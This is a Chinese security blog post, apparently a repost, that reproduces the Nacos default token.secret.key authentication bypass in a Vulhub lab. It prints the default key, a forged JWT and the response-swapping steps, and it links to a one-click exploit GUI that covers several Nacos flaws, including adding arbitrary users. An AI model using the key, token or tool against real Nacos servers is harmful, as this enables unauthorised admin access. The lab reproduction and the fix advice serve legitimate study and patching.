Nacos身份认证权限绕过+漏洞利用工具分享
2023-12-27 23:13:20 Author: 渗透安全团队(查看原文) 阅读量:114 收藏

一 JWT

JWT:

JSON Web Token (JWT)是一个开放标准(RFC 7519),它定义了一种紧凑的、自包含的方式,用于作为JSON对象在各方之间安全地传输信息。该信息可以被验证和信任,因为它是数字签名的。
在线解密查看内容:

  1. https://jwt.io/

JWT的使用场景:

1.Authorization(授权): 这是使用JWT的最常见场景。一旦用户登录,后续每个请求都将包含JWT,允许用户访问该令牌允许的路由、服务和资源。单点登录是现在广泛使用的JWT的一个特性,因为它的开销很小,并且可以轻松地跨域使用。

2.Exchange (信息交换):对于安全的在各方之间传输信息而言,JSON Web Tokens无疑是一种很好的方式。因为JWT可以被签名,例如,用公钥/私钥对,你可以确定发送人就是它们所说的那个人。另外,由于签名是使用头和有效负载计算的,您还可以验证内容没有被篡改。

JWT构造:

JSON Web Token由三部分组成,它们之间用圆点连接。
这三部分分别是:

  1. Header

  2. Payload

  3. Signature

Header由两部分组成:
1.token的类型(JWT)
2.算法名称(比如: HMACSHA256或者RSA等等)

Payload:
声明是关于实体(通常是用户)和其他数据的声明。
声明有三种类型: registered, public 和 private。

Signature:
为了得到签名部分,你必须有编码过的header、编码过的payload、一个秘钥,签名算法是header中指定的那个,然对它们签名即可。

二 漏洞描述:

开源服务管理平台Nacos在默认配置下未对token.secret.key进行修改,导致远程攻击者可以绕过密钥认证进入后台,造成系统受控等后果。

三 环境搭建

  1. 搭建地址:

  2. https://vulhub.org/#/docs/install-docker-one-click/

1.虚拟机安装一个kali,按照搭建地址上面的步骤一步一步安装docker容器,再把Vulhub下载到里面


2.安装完成后,来到nacos的cve的文件夹下面,运行命令行搭建环境

  1. docker-compose up -d


3.这样就可以搭建一个环境,在访问你的 http://你的环境ip:8848

4.移除环境

  1. docker-compose down


5.同样的Vulhub里面集合了很多漏洞的环境,都应该使用上面的步骤进行搭建环境去复现

四 漏洞复现

1.在nacos中,token.secret.key值是固定死的,位置在conf下的application.properties中
默认的key:

SecretKey012345678901234567890123456789012345678901234567890123456789

2.利用该默认 key可进行jwt构造,直接进入后台。
构造方法: 在https://jwt.io/ 中

payload设置
(1703214491是unix时间戳,设置这个参数的时候要比你系统当前的时间更晚):

  1. {

  2. "sub": "nacos",

  3. "exp": 1703214491

  4. }

把key输入到jwt的Signature当中

3.得到jwt密文,复制加密的jwt

  1. eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcwMzIxNDQ5MX0.OnuuwTKWB7_NaZFEYtTMbwbsiJAXGwteeyYh10sLz4w

4.复制上面得到的值,抓包修改包,添加Authorization值,发送到nacos,获取到登录成功的带有token的响应包

5.在登陆页面随机输入任意账号密码去登陆,修改响应包为登录成功带有token的响应包

6.成功绕过登录到后台页面

五 工具漏洞复现

1.这款NacosExploitGUI_v3.9.jar非常简单好用,一键检测漏洞利用。
支持了六种nacos漏洞检测:

  1. Nacos控制台默认口令漏洞(nacos,nacos)

  2. Nacos token.secret.key默认配置(QVD-2023-6271)

  3. Nacos-client Yaml反序列化漏洞

  4. Nacos Derby SQL注入漏洞 (CNVD-2020-67618)

  5. Nacos未授权访问漏洞(CVE-2021-29441

  6. Nacos Jraft Hessian反序列化漏洞(QVD-2023-13065)

2.可以利用存在的漏洞,任意添加用户

六 修复建议

  1. 1.自行修改key

  2. 2.更新到最新版本

七 工具分享

  1. Nacos工具

  2. https://www.alipan.com/s/iVNZyoz3uWf

  3. 提取码: 59ew

  1. 工具地址

  2. https://github.com/charonlight/NacosExploitGUI


付费圈子

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

加入安全交流群

                               

关 注 有 礼

关注下方公众号回复“666”可以领取一套领取黑客成长秘籍

 还在等什么?赶紧点击下方名片关注学习吧!


干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247513377&idx=1&sn=d1d3f1a5f699195ee0f9d8db1aa55959&chksm=c065e0b1ce1a7143a3aa9a963637f8c4dcfc3a2aa5fa940041ce0aa1d82ac7737c6e9b1be26d&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh